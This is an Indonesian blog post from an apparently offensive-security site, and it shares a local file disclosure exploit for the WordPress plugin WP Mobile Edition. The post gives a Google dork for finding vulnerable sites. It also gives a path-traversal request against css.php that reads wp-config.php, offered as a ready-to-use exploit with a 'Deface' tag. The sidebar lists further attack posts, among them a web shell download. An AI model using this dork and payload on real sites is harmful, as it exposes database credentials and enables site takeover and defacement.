• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

April 15, 2015 by Jack Wilder Leave a Comment

Yupp, kali ini mau share lagi exploit pada WordPress yang memiliki celah pada plugins WP Mobile Edition.
Plugin ‘WP Mobile Edition’ ini tidak memfilter parameter GET file di /themes/mTheme-Unus/css/css.php . Alhasil kita juga dapat melihat source dari konfigurasi WordPress yang terletak di wp-config.php .
Oke langsung saja.
Google Dorks :
inurl:?fdx_switcher=mobile
Exploit :
127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

Tested on : BackBox Linux

Sekian tutor kali ini semoga bermanfaat.

Shares

Filed Under: WordPress Exploit Tagged With: Bugs, Deface, Exploit, Security, Wordpress

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

WordPress Plugin CopySafe PDF Protection Shell Upload

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

MIME Type Sniffing pada Form Upload Gambar

MyBB 1.8.x SQL Injection Auto Exploit

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

RCE pada Redis via Master-Slave Replication

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

LinuxSec / 69 queries in 0.10 seconds